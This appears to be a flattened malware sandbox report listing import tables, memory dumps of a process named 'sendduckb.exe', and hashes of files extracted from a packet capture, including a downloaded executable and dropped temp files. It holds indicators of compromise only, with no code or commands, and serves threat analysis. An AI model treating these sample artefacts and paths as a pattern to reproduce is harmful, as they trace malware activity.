|
0x1000011b8
|
0xfeb0
|
0xf2b0
|
-
|
|
API Name
|
Ordinal
|
IAT Address
|
Thunk RVA
|
Thunk Offset
|
Hint
|
|
RtlCaptureContext
|
0x0
|
0x100001398
|
0x10090
|
0xf490
|
0x27b
|
|
RtlLookupFunctionEntry
|
0x0
|
0x1000013a0
|
0x10098
|
0xf498
|
0x401
|
|
RtlVirtualUnwind
|
0x0
|
0x1000013a8
|
0x100a0
|
0xf4a0
|
0x4f0
|
|
API Name
|
Ordinal
|
IAT Address
|
Thunk RVA
|
Thunk Offset
|
Hint
|
|
ord1141
|
0x475
|
0x100001248
|
0xff40
|
0xf340
|
-
|
|
ord1142
|
0x476
|
0x100001250
|
0xff48
|
0xf348
|
-
|
|
Name
|
Process ID
|
Start VA
|
End VA
|
Dump Reason
|
PE Rebuild
|
Bitness
|
Entry Point
|
AV
|
YARA
|
Actions
|
|
buffer
|
22
|
0x140000000
|
0x140022FFF
|
First Execution
|
|
64-bit
|
0x140006B54
|
|
|
|
|
sendduckb.exe
|
22
|
0xFF7E0000
|
0xFF7F5FFF
|
Relevant Image
|
|
64-bit
|
-
|
|
|
|
|
buffer
|
22
|
0x140000000
|
0x140022FFF
|
Content Changed
|
|
64-bit
|
0x140007784
|
|
|
|
|
buffer
|
22
|
0x140000000
|
0x140022FFF
|
Content Changed
|
|
64-bit
|
0x14000A9F8
|
|
|
|
|
buffer
|
22
|
0x140000000
|
0x140022FFF
|
Content Changed
|
|
64-bit
|
0x14000B9B4
|
|
|
|
|
buffer
|
22
|
0x140000000
|
0x140022FFF
|
Content Changed
|
|
64-bit
|
0x14000C5E0
|
|
|
|
|
buffer
|
22
|
0x140000000
|
0x140022FFF
|
Content Changed
|
|
64-bit
|
0x14000D88C
|
|
|
|
|
buffer
|
22
|
0x140000000
|
0x140022FFF
|
Content Changed
|
|
64-bit
|
0x1400046C0
|
|
|
|
|
buffer
|
22
|
0x140000000
|
0x140022FFF
|
Content Changed
|
|
64-bit
|
0x140005600
|
|
|
|
|
Mime Type
|
application/CDFV2
|
|
File Size
|
20.00 KB
|
|
MD5
|
2ada0850f5ce89a641f4207ebf5aeb41
|
|
SHA1
|
640e2fcae59fcc5188df28c24df5d883e1103a30
|
|
SHA256
|
69d486c23baf74048d0e18bd57b6e7bb331cedf18de001d899f32cdbc6bee4f6
|
|
SSDeep
|
96:wQB+wm9fmffwMGjIBdaB1uM1dm5Gf1uGNLZJZAAsY/k1BCV5oC/C2Ol48YXuhESt:wQM5wnAHK+i4iAfQjOq3p
|
|
ImpHash
|
None
|
|
Mime Type
|
application/CDFV2
|
|
File Size
|
20.00 KB
|
|
MD5
|
0442563f0615a2a47129af39e9c57547
|
|
SHA1
|
70e70adbc9e6278a1216b86ec7ed20766e904608
|
|
SHA256
|
672acd86cccc0f4290a5f3a3a2435734533fc8b32cda3ff7b73ea2ac5e626c92
|
|
SSDeep
|
96:woB+wm9fmffwMGjIBdaB1uM1dm5Gf1uGNLZJZAAsY/k1BCV5oC/C2Ol48YXuhESB:woM5wnAHK+i4iAfQjOqjp
|
|
ImpHash
|
None
|
|
Parent File
|
analysis.pcap
|
|
Mime Type
|
text/plain
|
|
File Size
|
1.16 KB
|
|
MD5
|
db1a53e3909e68a32ccc3524ca931c06
|
|
SHA1
|
8b783b113335946b5db104e20a4e6182259ccc28
|
|
SHA256
|
11a8f947339d30605a086d0c8865366567767e0354baaf83a941c484b7cb297b
|
|
SSDeep
|
24:gMFH2EoFK8zNj5Gg0Nb6IjHWXYqvxqGQVR+YfWnor1n4F5xlSAI/iCuR:gk2fFJNj4gej2XYUAGW5elSAIJ2
|
|
ImpHash
|
None
|
|
Parent File
|
analysis.pcap
|
|
Mime Type
|
text/plain
|
|
File Size
|
246 Bytes
|
|
MD5
|
001f4bf3d1e7e548f9a84edf959c9d3b
|
|
SHA1
|
6b4c77ed2707c61c9261a776d38d36db71612356
|
|
SHA256
|
2378505ba90d0efce5aad0e99f7404aeefea38e63d2143b55c36329a3b6f0565
|
|
SSDeep
|
6:qU9zpQWhfXHTYgbzjrJ9hEI3fX2rP1Qs3yDOUml:qoFQmH8gbzdvPw1T3yE
|
|
ImpHash
|
None
|
|
Parent File
|
analysis.pcap
|
|
Mime Type
|
application/octet-stream
|
|
File Size
|
148 Bytes
|
|
MD5
|
f0ee12fdb4639b948e5db810cffbcdf9
|
|
SHA1
|
19fbe97f86062221d2f2f5f8f7c88bb62687fb34
|
|
SHA256
|
2637cb9ee46cc3256cd8577abfc931afd12a96f9981b3fd5827227cf0ba12cd6
|
|
SSDeep
|
3:zsm31FFTfIjvjlHDX3WDAMgVlRFR4TH0fjF5npVbeL1apsVeHy:ImNfIjhjX3cAMUNlfDpVbeJg0eS
|
|
ImpHash
|
None
|
|
Parent File
|
analysis.pcap
|
|
Mime Type
|
application/octet-stream
|
|
File Size
|
1.89 MB
|
|
MD5
|
abc9f7b977a37b2baf61d89b79abf6d5
|
|
SHA1
|
a672154e14fdadec89e313b2dfa9424b089e9f34
|
|
SHA256
|
2e938bc4a4775df9b8d1200c344378e26384af7577fd8c2d382be2276671f74b
|
|
SSDeep
|
49152:6en2yKE4qSAHe6786HdIlFrLCSVsVQ/MMRTbMaMk7HABNOz:Dn2zqSA+S866FyVUMad7gBNOz
|
|
ImpHash
|
None
|
|
Parent File
|
analysis.pcap
|
|
Mime Type
|
application/octet-stream
|
|
File Size
|
132 Bytes
|
|
MD5
|
4ce233ff9b0068e71fa5c462d9f0667d
|
|
SHA1
|
fb253aab6a23712337c741607625ff6bd2839356
|
|
SHA256
|
71f317489fbcb825c6bdf67306ec7bbfb0b633d36a3ed6fb3d98e41f013c0ae5
|
|
SSDeep
|
3:ytMdfeD8jTKNSKGl3pA4ovPxqg/S5EgeHosi6eS:ytcfI8CNYlZLovJqgYmv1
|
|
ImpHash
|
None
|
|
Also Known As
|
C:\Users\aETAdzjz\186.exe (Downloaded File)
4GrqfSPj4IvR.exe (Embedded File)
|
|
Parent File
|
analysis.pcap
|
|
Mime Type
|
application/vnd.microsoft.portable-executable
|
|
File Size
|
884.25 KB
|
|
MD5
|
1ada9d6e0e7858c79e8fcfc6e4c385d2
|
|
SHA1
|
446104d79d7658a61a3b9da2cec4094d670ce991
|
|
SHA256
|
75c620faf2e8aaad8162ad086e48556233c578f5dbcc6d4a65d4982e94ff34c3
|
|
SSDeep
|
12288:vKKHHuBLe0OVaImhgnXLBakHEKJcJpL/CDFhuksHpZ/s:vZH2hgnla2EKJcH/6+VY
|
|
ImpHash
|
None
|
|
Parent File
|
analysis.pcap
|
|
Mime Type
|
application/octet-stream
|
|
File Size
|
148 Bytes
|
|
MD5
|
991ef62a831fe814065161224d2bc3c0
|
|
SHA1
|
0a8ae73092012efe045614d256b6d13abddbb3c7
|
|
SHA256
|
8e1ae0723fecadc45d941aecb35a413a7d262fa8bb4a83a85a6a2a9b53b93867
|
|
SSDeep
|
3:fe0cglwRNrzwc4wPUyZLq1Rg0BJFjLfVpFvMBeWXGWn:fUuYzwRVR/BJFjvFvzQGW
|
|
ImpHash
|
None
|
|
Parent File
|
analysis.pcap
|
|
Mime Type
|
text/plain
|
|
File Size
|
235 Bytes
|
|
MD5
|
c73f93d59b9391ac4b922aa97b6086dd
|
|
SHA1
|
aceac5aceba3ea8d9adc2d40d36fbfab445bbfbb
|
|
SHA256
|
9cf8b440553c89e47b7a895540e1f03075b7f15bea22ae8a228133a7e0555006
|
|
SSDeep
|
3:IuUKIc/1a1agcn1MNWQK7CvX/QKK/N9ngSnnxoQfTqJAOx8Llzu1hBVd2nwHd1yD:IuUbctD2NECHQKWngTQGlL2nwC/e2B
|
|
ImpHash
|
None
|
|
Parent File
|
analysis.pcap
|
|
Mime Type
|
text/plain
|
|
File Size
|
252 Bytes
|
|
MD5
|
b02489508f2ef9789b688e44a97bf8d6
|
|
SHA1
|
355cc89ad955e588cea152b103a7c22c73bf036a
|
|
SHA256
|
b76e9f86695cd63c763553bd860c3bf7918a7971160bc1bac7b054ad058f2648
|
|
SSDeep
|
6:5oWLKXyGV0aG4Cm7rZwLXgZB/Yr5jX3raNtxgt:5o6KXympXCm7r+L8wN3rcA
|
|
ImpHash
|
None
|
|
Parent File
|
analysis.pcap
|
|
Mime Type
|
text/plain
|
|
File Size
|
252 Bytes
|
|
MD5
|
3a5afdd64f6a8c1f7a8283ff79e2e916
|
|
SHA1
|
cda8cee7eb48d903075d897a0fc706cf7e1c1508
|
|
SHA256
|
bc695b3c606220452b883b30a00834c047a64a8f9fcd9345be7fe7dd80cb3d9a
|
|
SSDeep
|
6:2Mo+Fu3TW8Vcuqm0eUS3lBSMLkXMb7aeA0:2H+4WycvmZUSP8Mx/
|
|
ImpHash
|
None
|
|
Parent File
|
analysis.pcap
|
|
Mime Type
|
application/octet-stream
|
|
File Size
|
14.19 KB
|
|
MD5
|
ae7cdfbac191053906ebec37ebc852b1
|
|
SHA1
|
880378824351f398e793ba2a917edf14f416dfd1
|
|
SHA256
|
c87760958d4fe8a3a8c51760f0fd445e65028fcfea3010263a59cd84e724cf15
|
|
SSDeep
|
384:gN8TTnHp2aeaZ4m3rpmGNVNHt8dzSetZe2cvIMrSTPfA1SA7:nTzhP1mG5t8o2cvIM6Pff+
|
|
ImpHash
|
None
|
|
Parent File
|
analysis.pcap
|
|
Mime Type
|
application/octet-stream
|
|
File Size
|
148 Bytes
|
|
MD5
|
ab978eeab8dba7ed010ad8e9e749d897
|
|
SHA1
|
be8f858c3425c15bae717e652a51b9638031450a
|
|
SHA256
|
ed0031bde979f0f8c7373c948c6383539e092da37c2fa5a1461ccf039c640143
|
|
SSDeep
|
3:fe0cglwRNrzwc4wPUyZLq1Rg0BJFjLfLmvs9wviu+Uvxr+p:fUuYzwRVR/BJFj3mEFAvxr+p
|
|
ImpHash
|
None
|
|
Parent File
|
analysis.pcap
|
|
Mime Type
|
text/plain
|
|
File Size
|
1.18 KB
|
|
MD5
|
096025b556bcd4859a618818bf19c3b7
|
|
SHA1
|
286458887efcf22a728873aee63140b6e389c7b9
|
|
SHA256
|
f80bef0f7aed816867b8c49775c3c387fdb22ce02caef5e59d3c2fe9b5abcaa5
|
|
SSDeep
|
24:vilSWIJ8/3sHR/yHbNYlq5ET19eBNQmXdE493Ueui/QwN:atcIClqT/Qmn933X/r
|
|
ImpHash
|
None
|
|
Also Known As
|
C:\Users\aETAdzjz\AppData\Local\Temp\D394.tmp (Dropped File)
c:\users\aetadzjz\appdata\roaming\microsoft\forms\winword.box (Dropped File)
|
|
Mime Type
|
-
|
|
File Size
|
0 Bytes
|
|
MD5
|
d41d8cd98f00b204e9800998ecf8427e
|
|
SHA1
|
da39a3ee5e6b4b0d3255bfef95601890afd80709
|
|
SHA256
|
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
|
|
SSDeep
|
3::
|
|
ImpHash
|
None
|
